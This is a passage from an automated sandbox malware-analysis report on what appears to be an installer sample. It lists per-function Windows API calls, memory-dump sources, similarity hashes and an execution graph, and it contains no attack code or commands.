                                                  Function 00405A65 Relevance: 10.6, APIs: 7, Instructions: 76stringwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(0079F640,00000000,?,?,?), ref: 00405A9A
                                                  • lstrlenA.KERNEL32(?,0079F640,00000000,?,?,?), ref: 00405AAA
                                                  • lstrcatA.KERNEL32(0079F640,?,?,0079F640,00000000,?,?,?), ref: 00405AC3
                                                  • SetWindowTextA.USER32(0079F640,0079F640), ref: 00405ADE
                                                  • SendMessageA.USER32 ref: 00405B08
                                                  • SendMessageA.USER32(00000000,00001007,00000000,0079F640), ref: 00405B25
                                                  • SendMessageA.USER32(00000000,00001013,00000000,00000000), ref: 00405B33
                                                    • Part of subcall function 00405C08: lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405A98,0079F640,?,?,?,?), ref: 00405DE3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                  • String ID:
                                                  • API String ID: 1759915248-0
                                                  • Opcode ID: 860b860570a6bdf1dee3105dde6e314c32e3ea8240ebd3ea09cd58385db8663d
                                                  • Instruction ID: f85030e8b0c56f537beadb89fa8a9f76d5cc5969031f723e6c5fe352ed96c1e7
                                                  • Opcode Fuzzy Hash: 860b860570a6bdf1dee3105dde6e314c32e3ea8240ebd3ea09cd58385db8663d
                                                  • Instruction Fuzzy Hash: 8A210872A047156BD710EF158C40F6BBBE8EB95720F04043EFA85B7291C67CE8098FA9
                                                  Function 00403424 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040343F
                                                  • MulDiv.KERNEL32(000B8D10,00000064,000B8D10), ref: 00403467
                                                  • wsprintfA.USER32 ref: 00403477
                                                  • SetWindowTextA.USER32(?,?), ref: 00403487
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00403499
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00403471
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: cb9d993be01e685dfe7cd00fa0de0d0758d56356e8e165fa58e03073aa526adb
                                                  • Instruction ID: 96a7dd71afdf10f79f90d708e6bdb3ac081e813424a41c2ffb499782564f136e
                                                  • Opcode Fuzzy Hash: cb9d993be01e685dfe7cd00fa0de0d0758d56356e8e165fa58e03073aa526adb
                                                  • Instruction Fuzzy Hash: F4014F71500208FBDB119F60DE05EAA3B29EB04709F008039F646B91D1CBB49955CF9D
                                                  Function 73AD1F58 Relevance: 9.1, APIs: 6, Instructions: 134memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD20DD
                                                    • Part of subcall function 73AD12AF: lstrcpynA.KERNEL32(00000000,?,73AD1502,?,73AD11C4,-000000A0), ref: 73AD12BF
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73AD2042
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73AD205A
                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73AD206B
                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 73AD2081
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD2088
                                                    • Part of subcall function 73AD1958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,73AD20A7,00000000,?), ref: 73AD198A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 506890080-0
                                                  • Opcode ID: 8a72934b7d72d4b6fbf9f642cd64c01d124da7da82ae700f3630b145b8404f4a
                                                  • Instruction ID: 1a0c218ec91386ab93a012bfff9959948bc6090f70d46a39de3b856052844bfc
                                                  • Opcode Fuzzy Hash: 8a72934b7d72d4b6fbf9f642cd64c01d124da7da82ae700f3630b145b8404f4a
                                                  • Instruction Fuzzy Hash: A341C572525205EFD345AF24E846BAAB7E8FF48700F54823FF8498A18EDB345951CBE1
                                                  Function 73AD10C6 Relevance: 8.9, APIs: 7, Instructions: 155memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73AD1163
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD11B0
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD11CD
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73AD11E0
                                                  • GlobalFree.KERNEL32 ref: 73AD1249
                                                  • GlobalFree.KERNEL32(?), ref: 73AD1297
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD12A8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: d09014d73a4e95275733b63fa0817e6ba7bfc340925b8442dfbc895031b015f5
                                                  • Instruction ID: 5498e97d40b9808085e0b12c48a871cb809a1795f6e3224f51d91d9f00a00526
                                                  • Opcode Fuzzy Hash: d09014d73a4e95275733b63fa0817e6ba7bfc340925b8442dfbc895031b015f5
                                                  • Instruction Fuzzy Hash: 8551DFB25243009FE745DF79D952B25BBF8FB49204B14842EF48ACB29CD736E912CB90
                                                  Function 00406207 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403AB6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 0040620D
                                                  • CharPrevA.USER32(?,00000000), ref: 00406217
                                                  • lstrcatA.KERNEL32(?,00408298), ref: 00406228
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406207
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3355392842
                                                  • Opcode ID: bad418d4af1ebf64486b9eb99738b430292f36c280bef47347db2907ac8792f8
                                                  • Instruction ID: 3c495f3cc0a8455ad0d57a1320ed541fd21284608294d423194ca2ef8b277475
                                                  • Opcode Fuzzy Hash: bad418d4af1ebf64486b9eb99738b430292f36c280bef47347db2907ac8792f8
                                                  • Instruction Fuzzy Hash: 25D05E71101A20AFD2012714AE0CE8B3F58AF0631270604BAF582B2260CB38085287AD
                                                  Function 73AD1C2B Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD1C97
                                                  • GlobalFree.KERNEL32(?), ref: 73AD1D4E
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD1D51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID: /
                                                  • API String ID: 2979337801-2043925204
                                                  • Opcode ID: 475be69663a38e1d0ac65ea97ad3691e3e55e71a8790af6628f1bb3aadf5af7b
                                                  • Instruction ID: a7c3e91251f6067f850f22a4360102cc56170aa91ad5935d17e8a1b6abd2609b
                                                  • Opcode Fuzzy Hash: 475be69663a38e1d0ac65ea97ad3691e3e55e71a8790af6628f1bb3aadf5af7b
                                                  • Instruction Fuzzy Hash: D6511A72A3C3854FE3D29E75858732A66FABB8E100F580B1FE0D28335CDBA5D8454362
                                                  Function 0040315E Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,0040334E), ref: 0040316F
                                                  • GetTickCount.KERNEL32 ref: 0040318E
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00403424,00000000), ref: 004031AD
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004031BB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 978edb9a71616790b966c465537ea2c7d484158e7995eac0d890d3008c97679c
                                                  • Instruction ID: 14c6daf26f2ba902eba0c89fbd035ef2e3980b9ad237a5036cf4e57ec4455238
                                                  • Opcode Fuzzy Hash: 978edb9a71616790b966c465537ea2c7d484158e7995eac0d890d3008c97679c
                                                  • Instruction Fuzzy Hash: 07F0D430650704BBDB15AF24EF4DB163AA8F744B4AF8445B9E540BA2E1EB7C4444CA1C
                                                  Function 73AD1E71 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 73AD1EA4
                                                  • lstrcpyA.KERNEL32(?,error,00000818,73AD16E5,00000000,?), ref: 73AD1EC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: lstrcpywsprintf
                                                  • String ID: callback%d$error
                                                  • API String ID: 2408954437-1307476583
                                                  • Opcode ID: 009d5d7460e277057d21e3d49246320bba7ba56e6a8b8be629764ddb15ba5742
                                                  • Instruction ID: e6e4830bcaa072f283c672a286262d869a39888dcdc9218de8eed845bcf25966
                                                  • Opcode Fuzzy Hash: 009d5d7460e277057d21e3d49246320bba7ba56e6a8b8be629764ddb15ba5742
                                                  • Instruction Fuzzy Hash: A1F05E312141209FC7049B04E84AFB673EAFF88300F09C4AEF8499724DCF74AC018B95
                                                  Function 00405F78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DispatchMessageA.USER32(?), ref: 00405F84
                                                  • PeekMessageA.USER32(?,00000000,?,N3@,00000001), ref: 00405F98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchPeek
                                                  • String ID: N3@
                                                  • API String ID: 1770753511-133324152
                                                  • Opcode ID: 1adb22ebabfbfad76f18fd6e83556fb283b3a93a0faec1d1b16a7c0a08b498de
                                                  • Instruction ID: d163192144520e620c39002f5eb6f3343bd6a6af6b02d706f75ca1fefbd95399
                                                  • Opcode Fuzzy Hash: 1adb22ebabfbfad76f18fd6e83556fb283b3a93a0faec1d1b16a7c0a08b498de
                                                  • Instruction Fuzzy Hash: F6D01231A0020EBBDF109FA0CD09FAB7B6CAF04744F408026FE41A5090DB78D1168B69

                                                  Execution Graph

                                                  Execution Coverage:0%
                                                  Dynamic/Decrypted Code Coverage:98.7%
                                                  Signature Coverage:22.7%
                                                  Total number of Nodes:75
                                                  Total number of Limit Nodes:0
                                                  execution_graph 51993 3450b950 579 API calls 51994 3451c850 610 API calls 51997 3453415f 359 API calls 51998 344fa740 443 API calls 51999 344fc140 365 API calls 52000 34503640 370 API calls 52002 344f6c5d 358 API calls 52003 3452ea40 389 API calls 52006 3451e547 620 API calls 52008 34501f70 382 API calls 52009 3452af72 385 API calls 52010 3452a370 358 API calls 52011 344f7060 RtlDebugPrintTimes 52012 344fb260 377 API calls 52014 344f7860 206 API calls 52015 34503c60 18 API calls 52016 344fc170 650 API calls 52018 34502410 660 API calls 52019 34509810 613 API calls 52020 344f640d 614 API calls 52021 3452c310 362 API calls 52023 3452cb10 GetPEB GetPEB GetPEB GetPEB 52025 344fec0b 650 API calls 52026 3458c51d 8 API calls 52029 344f6e00 RtlDebugPrintTimes RtlDebugPrintTimes 52031 3452d600 789 API calls 52033 344f821b 386 API calls 52034 344f9610 611 API calls 52038 3451d530 357 API calls 52040 34502e32 381 API calls 52041 34530030 356 API calls 52042 344fb420 212 API calls 52043 344fb620 207 API calls 52045 344fbf20 381 API calls 52046 34502022 217 API calls 52047 3458db2a 13 API calls 52049 34531527 362 API calls 52052 344fb830 607 API calls 52053 344f7a30 377 API calls 52056 34503bd0 16 API calls 52057 3452f4d0 369 API calls 52059 4034ce 16 API calls 52060 344fb0c0 449 API calls 52061 344f81c0 205 API calls 52062 344fe3c0 444 API calls 52063 344fbfc0 11 API calls 52064 34501dc0 18 API calls 52066 345151c0 408 API calls 52068 344fc1d0 360 API calls 52069 344f9fd0 357 API calls 52070 3452acf0 366 API calls 52071 3452ccf0 GetPEB GetPEB 52073 344f72e0 356 API calls 52075 345058e0 896 API calls 52076 345266e0 454 API calls 52077 34503ee2 18 API calls 52078 3452e9e0 377 API calls 52080 345354e0 205 API calls 52081 344f73f0 6 API calls 52082 3450c690 GetPEB 52083 3451d690 9 API calls 51992 34542b90 LdrInitializeThunk 52087 3452be80 357 API calls 52091 344f8196 8 API calls 52092 344fc090 381 API calls 52093 344fa290 573 API calls 52094 344ffe90 13 API calls 52095 345045b0 648 API calls 52096 345042b0 8 API calls 52098 344fe9ac 653 API calls 52100 344f7da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 52101 344fbea0 368 API calls 52102 345006a0 385 API calls 52104 345000a0 618 API calls 52106 345343a0 384 API calls

                                                  Executed Functions

                                                  Function 345434E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2 345434e0-345434ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d700cd5ab5ba8af8349f25260f135a945b827216b468e4b3ddb0b7b0274328e1
                                                  • Instruction ID: f04f6e881b986b5626af6717bb8c1bf604c6e60ceea3dc5a3a254c5685f889f1
                                                  • Opcode Fuzzy Hash: d700cd5ab5ba8af8349f25260f135a945b827216b468e4b3ddb0b7b0274328e1
                                                  • Instruction Fuzzy Hash: 0C900231A0510812D50061584624716104587D0245F61CC57A0425529DC7A5C96975A2
                                                  Function 34542D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1 34542d10-34542d1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f3af53940c7fe105cb9df1ac165ef58f4927ff3b86bf07d44f2a071f9bb09bb1
                                                  • Instruction ID: a509d7164138cb9862dd07df1825b1b3c17fbf9becb717fd2b42fe98333e820b
                                                  • Opcode Fuzzy Hash: f3af53940c7fe105cb9df1ac165ef58f4927ff3b86bf07d44f2a071f9bb09bb1
                                                  • Instruction Fuzzy Hash: 6990023160100823D51161584614717004987D0285F91CC57A0425519DD666C96AB121
                                                  Function 34542B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 34542b90-34542b9c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 728e08d8e7f346458b71e5e3c55bbbd041e7d7833637cbf7edb06d51863f3885
                                                  • Instruction ID: 9cd335d8333d591f72331e336e71dcffd7b74543647ede7c692fad89f25effe9
                                                  • Opcode Fuzzy Hash: 728e08d8e7f346458b71e5e3c55bbbd041e7d7833637cbf7edb06d51863f3885
                                                  • Instruction Fuzzy Hash: 6790023160108C12D5106158851475A004587D0345F55CC57A4425619DC6A5C8A97121

                                                  Non-executed Functions

                                                  Function 345A9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
